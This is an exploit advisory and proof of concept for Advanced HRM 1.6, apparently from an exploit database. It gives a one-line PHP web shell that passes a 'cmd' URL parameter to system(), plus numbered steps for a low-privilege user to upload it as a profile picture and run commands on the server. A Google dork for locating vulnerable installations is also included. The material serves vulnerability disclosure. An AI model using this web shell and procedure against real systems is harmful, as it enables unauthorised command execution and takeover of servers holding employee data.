# Exploit Title: Advanced HRM 1.6 - Remote Code Execution
# Google Dork: intext:"Advanced HRM"
# Date: 2018-10-06
# Exploit Author: Renos Nikolaou
# Vendor Homepage: https://coderpixel.com/
# Software Link: https://codecanyon.net/item/advanced-hrm/17767006
# Version: 1.6
# Tested on: Windows 10
# CVE: N/A
# Description : Advanced HRM 1.6 allows users to upload arbitrary files which
# leads to a remote command execution on the remote server.
# PoC
# 1) Create a php file with the below code:
<?php $cmd=$_GET['cmd']; system($cmd); ?>
# 2) Login to Advanced HRM portal as low priviliage user
# 3) At the right hand side go to Update Profile --> Change Picture ( http://domain/hrm/user/edit-profile )
# 4) Click Browse and upload your file containing the PHP code mentioned at step 1.
# 5) Click Update
# 6) Right click at the Profile image and select Copy image Location
# 7) Paste the URL into your browser. Will be similar to: http://domain/hrm/assets/employee_pic/cmd.php
# 8) Verify the exploit: http://domain/hrm/assets/employee_pic/cmd.php?cmd=id